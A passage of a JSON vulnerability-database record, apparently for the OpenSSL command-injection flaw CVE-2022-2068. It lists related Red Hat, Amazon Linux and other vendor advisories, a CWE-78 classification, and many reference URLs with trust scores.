"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226517 - Security Advisory"
},
{
"title": "Red Hat: Important: Self Node Remediation Operator 0.4.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226184 - Security Advisory"
},
{
"title": "Red Hat: Important: Satellite 6.11.5.6 async security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20235980 - Security Advisory"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-123",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-123"
},
{
"title": "Red Hat: Important: Satellite 6.12.5.2 Async Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20235979 - Security Advisory"
},
{
"title": "Red Hat: Critical: Multicluster Engine for Kubernetes 2.0.2 security and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226422 - Security Advisory"
},
{
"title": "Brocade Security Advisories: Access Denied",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories\u0026qid=8efbc4133194fcddd0bca99df112b683"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.11.1 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226103 - Security Advisory"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-195",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-195"
},
{
"title": "Red Hat: Important: Node Maintenance Operator 4.11.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226188 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Openshift Logging Security and Bug Fix update (5.3.11)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226182 - Security Advisory"
},
{
"title": "Red Hat: Important: Logging Subsystem 5.5.0 - Red Hat OpenShift security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226051 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat OpenShift Service Mesh 2.2.2 Containers security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226283 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Logging Subsystem 5.4.5 Security and Bug Fix Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226183 - Security Advisory"
},
{
"title": "Red Hat: Critical: Red Hat Advanced Cluster Management 2.5.2 security fixes and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226507 - Security Advisory"
},
{
"title": "Red Hat: Moderate: RHOSDT 2.6.0 operator/operand containers Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227055 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift sandboxed containers 1.3.1 security fix and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227058 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.51 SP1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228840 - Security Advisory"
},
{
"title": "Red Hat: Moderate: New container image for Red Hat Ceph Storage 5.2 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226024 - Security Advisory"
},
{
"title": "Red Hat: Moderate: RHACS 3.72 enhancement and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226714 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift API for Data Protection (OADP) 1.1.0 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226290 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Gatekeeper Operator v0.2 security and container updates",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226348 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Multicluster Engine for Kubernetes 2.1 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226345 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.51 SP1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228841 - Security Advisory"
},
{
"title": "Red Hat: Moderate: RHSA: Submariner 0.13 - security and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226346 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift API for Data Protection (OADP) 1.0.4 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226430 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.6.0 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226370 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.3.12 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226271 - Security Advisory"
},
{
"title": "Red Hat: Critical: Red Hat Advanced Cluster Management 2.4.6 security update and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226696 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift Data Foundation 4.11.0 security, enhancement, \u0026 bugfix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226156 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Virtualization 4.11.1 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228750 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Virtualization 4.11.0 Images security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226526 - Security Advisory"
},
{
"title": "Red Hat: Important: Migration Toolkit for Containers (MTC) 1.7.4 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226429 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Virtualization 4.12.0 Images security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230408 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Openshift Logging 5.3.14 bug fix release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228889 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Logging Subsystem 5.5.5 - Red Hat OpenShift security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228781 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Container Platform 4.11.0 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225069 - Security Advisory"
},
{
"title": "Smart Check Scan-Report",
"trust": 0.1,
"url": "https://github.com/mawinkler/c1-cs-scan-result "
},
{
"title": "Repository with scripts to verify system against CVE",
"trust": 0.1,
"url": "https://github.com/backloop-biz/Vulnerability_checker "
},
{
"title": "https://github.com/jntass/TASSL-1.1.1",
"trust": 0.1,
"url": "https://github.com/jntass/TASSL-1.1.1 "
},
{
"title": "Repository with scripts to verify system against CVE",
"trust": 0.1,
"url": "https://github.com/backloop-biz/CVE_checks "
},
{
"title": "https://github.com/tianocore-docs/ThirdPartySecurityAdvisories",
"trust": 0.1,
"url": "https://github.com/tianocore-docs/ThirdPartySecurityAdvisories "
},
{
"title": "OpenSSL-CVE-lib",
"trust": 0.1,
"url": "https://github.com/chnzzh/OpenSSL-CVE-lib "
},
{
"title": "The Register",
"trust": 0.1,
"url": "https://www.theregister.co.uk/2022/06/27/openssl_304_memory_corruption_bug/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-2068"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-2068"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.2,
"url": "https://www.debian.org/security/2022/dsa-5169"
},
{
"trust": 1.1,
"url": "https://www.openssl.org/news/secadv/20220621.txt"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20220707-0008/"
},
{
"trust": 1.1,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf"
},
{
"trust": 1.1,
"url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=2c9c35870601b4a44d86ddbf512b38df38285cfa"
},
{
"trust": 1.1,
"url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=9639817dac8bbbaa64d09efad7464ccc405527c7"
},
{
"trust": 1.1,
"url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6wzzbkuhqfgskgnxxkicsrpl7amvw5m5/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/vcmnwkerpbkoebnl7clttx3zzczlh7xa/"
},
{
"trust": 1.0,
"url": "https://gitlab.com/fraf0/cve-2022-1292-re_score-analysis"
},
{
"trust": 1.0,
"url": "http://seclists.org/fulldisclosure/2024/nov/0"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2068"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1292"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2022-1292"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2022-2068"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-2097"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1586"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1785"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1897"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1927"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2097"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1586"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-37434"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1897"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1927"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1785"
},
{
"trust": 0.2,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-38561"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-30631"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-38561"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26716"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-27406"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-30293"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35525"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-40674"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22624"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-34903"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22662"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35527"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2016-3709"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-3709"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-42898"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22629"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26717"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35525"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-32208"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26719"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2509"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26709"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26700"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-27405"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26710"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1304"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-27404"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-32206"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35527"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22628"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3515"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/backloop-biz/vulnerability_checker"
},
{
"trust": 0.1,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-319-01"
},
{
"trust": 0.1,
"url": "https://alas.aws.amazon.com/alas-2022-1626.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25314"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27782"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27776"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0670"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_ceph_storage/5.2/html-single/release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-40528"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-43813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/1548993"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25313"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27774"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0670"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25314"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-40528"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/2789521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21673"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21673"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25313"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6024"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/openssl"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0759"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32250"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21698"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1012"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1012"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32250"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0759"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6051"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30631"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21698"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-20107"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0408"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30632"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30698"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30629"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23772"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28131"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0391"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0391"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44716"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29526"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0934"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-0256"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30633"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1705"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23773"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30630"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24795"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1962"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30635"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3787"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44716"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0256"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25309"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30699"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25310"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32148"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1798"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0934"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-0308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-20107"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8913"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=securitypatches\u0026version=5.7"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28614"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32207"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22721"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26377"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8841"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-40303"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-31813"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42915"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28615"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42916"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22721"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-35252"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31813"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28614"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28330"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28615"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28330"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26377"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-40304"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32221"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-6457-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/nodejs/12.22.9~dfsg-1ubuntu3.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0778"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36516"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24448"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8889"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21618"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0168"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21628"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0617"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0924"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0562"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2639"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0908"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1055"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0865"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26373"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-20368"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1048"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3640"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0561"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0617"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-39399"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0562"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0854"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29581"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1016"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2078"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22844"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2938"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21499"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-36946"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42003"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0865"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0909"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1852"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0561"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0854"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0168"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21626"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28390"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36558"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30002"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36518"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27950"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2586"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23960"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3640"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30002"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36518"
},
{
